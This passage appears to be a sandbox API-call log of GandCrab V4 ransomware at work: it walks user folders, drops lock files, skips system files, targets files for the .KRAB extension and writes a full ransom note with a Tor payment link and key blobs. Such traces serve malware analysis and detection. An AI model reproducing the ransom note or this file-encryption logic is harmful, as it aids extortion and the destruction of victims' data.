fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.985] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.985] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.985] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.985] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.985] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.986] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Videos\\\\KRAB-DECRYPT.txt") returned 41 [0100.986] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\videos\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0100.986] GetLastError () returned 0x50 [0100.986] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.987] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.987] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0xba)) [0100.987] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.987] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.987] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.988] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Videos\\d2ca4a08d2ca4dee3d.lock") returned 47 [0100.988] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\videos\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.988] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.988] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.989] lstrlenW (lpString="C:\\Users\\Default\\Videos\\") returned 24 [0100.989] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Videos\\*") returned="C:\\Users\\Default\\Videos\\*" [0100.989] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdae0 [0100.989] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.989] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.989] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.989] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.989] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.989] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.989] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.989] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\Videos\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\Videos\\d2ca4a08d2ca4dee3d.lock" [0100.989] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.990] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Videos\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 52 [0100.990] lstrlenW (lpString="C:\\Users\\Default\\Videos\\d2ca4a08d2ca4dee3d.lock") returned 47 [0100.990] lstrlenW (lpString=".lock") returned 5 [0100.990] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.990] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.990] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.991] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.991] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.991] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.991] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.991] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Videos\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\Videos\\KRAB-DECRYPT.txt" [0100.991] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.991] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Videos\\KRAB-DECRYPT.txt.KRAB") returned 45 [0100.992] lstrlenW (lpString="C:\\Users\\Default\\Videos\\KRAB-DECRYPT.txt") returned 40 [0100.992] lstrlenW (lpString=".txt") returned 4 [0100.992] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.992] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.992] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.992] lstrlenW (lpString="C:\\Users\\Default\\Videos\\KRAB-DECRYPT.txt") returned 40 [0100.992] lstrlenW (lpString="C:\\Users\\Default\\Videos\\KRAB-DECRYPT.txt") returned 40 [0100.992] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.993] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.993] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.993] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.993] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.993] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.993] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.994] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.995] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0100.995] FindClose (in: hFindFile=0xfbdae0 | out: hFindFile=0xfbdae0) returned 1 [0100.995] CloseHandle (hObject=0x320) returned 1 [0100.995] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0 [0100.995] FindClose (in: hFindFile=0xfbe0e0 | out: hFindFile=0xfbe0e0) returned 1 [0100.995] CloseHandle (hObject=0x368) returned 1 [0100.995] FindNextFileW (in: hFindFile=0xfbe060, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0100.996] lstrcmpW (lpString1="Default User", lpString2=".") returned 1 [0100.996] lstrcmpW (lpString1="Default User", lpString2="..") returned 1 [0100.996] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0100.996] lstrcatW (in: lpString1="C:\\Users\\Default User", lpString2="\\" | out: lpString1="C:\\Users\\Default User\\") returned="C:\\Users\\Default User\\" [0100.996] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.996] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.996] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.996] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.996] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.996] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.997] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.997] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default User\\\\KRAB-DECRYPT.txt") returned 39 [0100.997] CreateFileW (lpFileName="C:\\Users\\Default User\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default user\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0100.998] GetLastError () returned 0x50 [0100.998] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.999] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.999] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0xc9)) [0100.999] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.999] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.000] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.000] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default User\\d2ca4a08d2ca4dee3d.lock") returned 45 [0101.000] CreateFileW (lpFileName="C:\\Users\\Default User\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default user\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x368 [0101.001] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.002] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.002] lstrlenW (lpString="C:\\Users\\Default User\\") returned 22 [0101.002] lstrcatW (in: lpString1="C:\\Users\\Default User\\", lpString2="*" | out: lpString1="C:\\Users\\Default User\\*") returned="C:\\Users\\Default User\\*" [0101.002] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*", lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0xffffffff [0101.002] CloseHandle (hObject=0x368) returned 1 [0101.003] FindNextFileW (in: hFindFile=0xfbe060, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0101.003] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0101.003] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0101.003] lstrcatW (in: lpString1="C:\\Users\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\desktop.ini") returned="C:\\Users\\desktop.ini" [0101.003] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.003] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\desktop.ini.KRAB") returned 25 [0101.003] lstrlenW (lpString="C:\\Users\\desktop.ini") returned 20 [0101.003] lstrlenW (lpString=".ini") returned 4 [0101.003] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.004] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0101.004] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.004] lstrlenW (lpString="C:\\Users\\desktop.ini") returned 20 [0101.004] lstrlenW (lpString="C:\\Users\\desktop.ini") returned 20 [0101.004] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0101.004] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.005] FindNextFileW (in: hFindFile=0xfbe060, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0101.005] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0101.005] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0101.005] lstrcatW (in: lpString1="C:\\Users\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\KRAB-DECRYPT.txt") returned="C:\\Users\\KRAB-DECRYPT.txt" [0101.005] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.005] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\KRAB-DECRYPT.txt.KRAB") returned 30 [0101.005] lstrlenW (lpString="C:\\Users\\KRAB-DECRYPT.txt") returned 25 [0101.005] lstrlenW (lpString=".txt") returned 4 [0101.005] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.006] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0101.006] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.006] lstrlenW (lpString="C:\\Users\\KRAB-DECRYPT.txt") returned 25 [0101.006] lstrlenW (lpString="C:\\Users\\KRAB-DECRYPT.txt") returned 25 [0101.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0101.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0101.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0101.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0101.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0101.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0101.007] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0101.007] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0101.007] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0101.007] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0101.007] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.007] FindNextFileW (in: hFindFile=0xfbe060, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0101.007] lstrcmpW (lpString1="Public", lpString2=".") returned 1 [0101.007] lstrcmpW (lpString1="Public", lpString2="..") returned 1 [0101.007] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0101.007] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0101.007] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.008] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.008] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.008] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.008] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.008] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.008] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.009] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\\\KRAB-DECRYPT.txt") returned 33 [0101.009] CreateFileW (lpFileName="C:\\Users\\Public\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0101.011] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0101.011] WriteFile (in: hFile=0x368, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f4a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f4a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0101.012] CloseHandle (hObject=0x368) returned 1 [0101.012] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.013] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.013] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0xd8)) [0101.013] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.013] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.019] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.019] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\d2ca4a08d2ca4dee3d.lock") returned 39 [0101.019] CreateFileW (lpFileName="C:\\Users\\Public\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x368 [0101.021] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.021] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.022] lstrlenW (lpString="C:\\Users\\Public\\") returned 16 [0101.022] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\*") returned="C:\\Users\\Public\\*" [0101.022] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0xfbdfe0 [0101.022] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0101.022] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.022] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0101.022] lstrcmpW (lpString1="..", lpString2="..") returned 0 